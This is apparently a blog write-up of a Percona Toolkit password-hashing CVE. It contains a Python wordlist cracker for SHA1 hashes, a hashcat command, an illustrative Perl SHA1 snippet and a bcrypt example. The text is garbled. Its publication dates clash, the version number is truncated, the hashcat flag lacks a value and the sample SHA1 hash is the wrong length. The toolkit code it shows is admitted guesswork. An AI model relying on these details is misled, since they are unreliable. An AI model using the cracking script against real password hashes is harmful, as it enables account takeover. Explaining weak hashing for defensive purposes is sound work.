CVE-2024-7701 - Exploiting Weak Password Hashing in Percona Toolkit for Easy Brute-Forcing

On June 18, 2024, a new vulnerability—CVE-2024-7701—was published, targeting the popular Percona Toolkit. This toolkit contains various command-line tools for managing MySQL and MariaDB environments. Version 3.6. is affected by a weakness in its password hashing approach, making it possible for attackers to brute-force encrypted passwords with little effort.

This post breaks down the vulnerability in simple terms, explains how attackers can exploit it, provides code illustrations, and includes references for further reading.

What Is the Problem?

Percona Toolkit 3.6. uses an outdated or weak password hashing function that doesn't slow down brute-force attacks. Good hashing algorithms take time and computation to convert a password into a hash. Weak algorithms like plain MD5 or SHA1, or a low-iteration PBKDF2, let attackers try thousands or even millions of passwords per second.

Result: An attacker who gets access to a hashed password can easily guess it using tools on ordinary hardware.

Why Does This Happen?

The toolkit uses hashing for storing or transporting passwords. However, it does not use a strong Key Derivation Function (KDF) with a high computational cost (like bcrypt, scrypt, or argon2). Instead, it relies on fast, single-round functions.

Let's say the toolkit stores password hashes using simple SHA1, like this

use Digest::SHA qw(sha1_hex);

my $password = 'mysecretpassword';
my $hash = sha1_hex($password);

print "SHA1 hash: $hash\n";

If an attacker gets $hash, they can run a dictionary or brute-force attack, like this (using Python):

import hashlib

def crack_sha1_hash(given_hash, wordlist):
    with open(wordlist, "r") as file:
        for line in file:
            word = line.strip()
            hash = hashlib.sha1(word.encode('utf-8')).hexdigest()
            if hash == given_hash:
                print(f"[+] Password found: {word}")
                return
    print("[-] Password not found in wordlist.")

# Example usage:
crack_sha1_hash("2bb80d537b1da3e38bd30361aa855686bdebaec", "rockyou.txt")

Even a huge password list finishes quickly because SHA1 is fast to compute.

Hashcat is a popular open-source hash cracker. For SHA1

hashcat -m 100 -a  hashes.txt rockyou.txt

-a = dictionary attack

If the hash is in the dictionary, hashcat will find it in seconds.

Example of Secure Hashing (with bcrypt in Python)

import bcrypt

password = b"my_new_password"
hashed = bcrypt.hashpw(password, bcrypt.gensalt())

print(hashed)

References

1. CVE-2024-7701 at NVD
2. Percona Toolkit GitHub
3. Password Storage Cheat Sheet - OWASP
4. Hashcat Tool
5. Percona Toolkit Documentation

Conclusion

CVE-2024-7701 is a dangerous vulnerability for any server using Percona Toolkit 3.6. to handle passwords. Because the toolkit uses insufficient hash computation, brute-forcing passwords is quick and easy for attackers. Update as soon as a fixed version is available and never rely on fast, outdated hash functions to protect passwords.

Timeline

Published on: 12/15/2024 11:15:05 UTC